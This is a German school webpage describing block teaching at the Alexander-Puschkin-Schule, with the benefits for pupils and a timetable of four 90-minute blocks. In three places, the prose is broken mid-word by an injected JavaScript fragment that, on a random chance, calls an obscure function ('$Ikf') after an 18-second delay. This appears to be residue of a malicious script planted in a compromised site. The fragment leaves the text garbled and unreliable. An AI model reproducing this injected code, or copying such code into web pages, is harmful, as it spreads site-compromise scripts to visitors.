Unterrichtsorganisation

 

 

Seit dem Schuljahr 2011/12 wird an der Alexandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander-Puschkin-Schule im Blockunterricht gelernt und gearbeitet.

Was bedeutet das konkret?

Die Unterrichtszeit von 45 Minuten wird aufgehoben und auf 90 Minuten erweitert.

Somit ist eine längere Beschäftigung mit dem Unterrichtsgegenstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and und eine flexiblere Gestaltung des Unterrichts möglich.

Die Arbeitsphasen für den Schüler, sich mit dem Lernstoff auseinandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderzusetzen, verlängern sich und das Denken in größerem Zeitumfang wird möglich.

 

Für die Schüler bringt der Blockunterricht viele Vorteile mit sich:

  • Der ständige Wechsel von Zeit, Inhalten und Lehrern entfällt.
  • Durch den geringen Fachwechsel haben die Schüler eine bessere Aufnahmefähigkeit und können sich so auf wenige Unterrichtsfächer konzentrieren.
  • Da an einem Tag nur 3, höchstens jedoch 4 verschiedene Fächer unterrichtet werden können, verringert sich die Vorbereitungszeit auf den Unterricht durch die Schüler (Hausaufgaben).
  • Das mitzubringende Material reduziert sich (bedeutet leichtere Mappen- statt 6 -8 verschiedene Fächer am Tag höchstens 3-4). Einstündig zu erteilende Fächer werden als Block in einer A und B Woche oder epochal unterrichtet.

Der Blockunterricht entspricht den Zielen eines modernen Unterrichts.


Unterrichtszeiten im Blockmodell

Block 1 08:00 – 09:30
Pause 09:30 – 10:00
Block 2 10:00 – 11:30
Pause 11:30 – 12:00
Block 3 12:00 – 13:30
Pause 13:30 – 13:40
Block 4 13:40 – 15:10

Verteilung der A und B Wochen im Schuljahr 2020/21